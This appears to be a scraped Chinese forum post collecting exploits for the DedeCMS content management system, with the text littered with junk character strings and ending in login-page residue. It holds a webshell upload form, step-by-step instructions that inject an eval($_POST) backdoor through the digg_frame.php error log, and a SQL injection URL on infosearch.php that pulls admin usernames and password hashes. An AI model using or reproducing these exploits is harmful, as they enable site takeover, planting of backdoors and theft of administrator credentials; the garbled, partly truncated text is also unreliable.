+ }5 l% ]9 q$ h; Q: T<input type='hidden' name='newname' value='fly.php' />  d2 Q9 w! ^! q/ D# Y& N
Select U Shell <input type='file' name='uploadfile' size='25' />
  \3 m( k" I4 s/ ]8 R8 y<input type='submit' name='sb1' value='确定' />
5 {' v9 p* I+ x$ k% Z</form>
& |* \. V6 `& C3 g<br />It's just a exp for the bug of Dedecms V55...<br />3 D+ m% a/ K7 P3 v/ N0 V
Need register_globals = on...<br />
& K3 A" u6 ?9 v+ v. V9 g: ~$ eFun the game,get a webshell at /data/cache/fly.php...<br />
- v! v: }, ]# u6 b/ u* P4 [& A</body>/ p, I) i. Z1 C7 ]; y
</html>
8 C$ L1 z. l# U) K8 Y$ m6 J8 a% q3 F! N2 u" \& r1 n) c

! S, J. u4 V; n5 l$ |+ T6 B5 W6 k; a3 X9 p+ D- T% W
, o$ t% _2 m" x1 @3 W$ }& e% e

% b/ R2 c) p3 v" ]- e. n% o
4 P! l" d7 ?2 E+ M, e% Y. C  l( D- |; k7 L# e1 W8 L

- u8 u; t3 v1 A2 T% I7 m1 Q% t6 H* Z
" k( X4 D( c0 s0 w7 A
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞& T9 U- L: z  J# z+ g! i: Q$ [
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
/ M8 R4 }7 O9 u1 I. s$ z1. 访问网址：
1 h6 C+ i* W$ Vhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>& q% \; O: d0 U: p# a/ {) i- _: i5 V( e
可看见错误信息7 s3 N8 ~  C- ~9 V+ \

9 b. v4 a0 I) M- W
7 V  m  x4 W1 A! [3 X5 R* w2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
& b6 j" Y# V" S6 ^4 p9 G* E, {% aint(3) Error: Illegal double '1024e1024' value found during parsing
, j4 r/ u6 k& r# X7 u8 ]. m3 z/ kError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
, X" a4 L" d7 v3 u5 T
/ A2 L: n, a: `$ x. F% \
9 j6 r6 H4 F( v* S: ~# K  ~3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是" ?& v8 s) U2 t# q& k
* l( n% ?- {! @( o

3 W5 t" I; C9 g( d" w. U* _; r0 [<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>) J6 P5 W4 y0 V+ `$ L
9 w. |8 Z1 B/ W

; ^3 ~3 g* g$ j  d0 J按确定后的看到第2步骤的信息表示文件木马上传成功.* }& {$ B2 l, \. H

9 L) ?6 V, r7 u% {/ O( B
  m7 \9 O# w8 z0 H, A8 Y1 O" Y% J% v0 |2 _; D

6 n9 \+ ]+ W: n5 r7 Y* `! G
  t* V. [/ R/ C
( O$ X7 }( p5 d- Y+ D+ Z  E
" _& ?+ J& |0 {7 Y! o
8 s) Z* _% W8 `* c2 o+ M: o. {7 B: _( N) R$ W' T& G

+ \- X! Y, [/ P$ ?2 e
* V3 n4 S& ?. T/ O  f( H( @
9 e  o  Q7 ?- g" x3 w; o" M3 g' v织梦(DedeCms)plus/infosearch.php 文件注入漏洞
# V3 v" w7 @/ V! `! Q) x8 ohttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

		自动登录	找回密码
密码			立即注册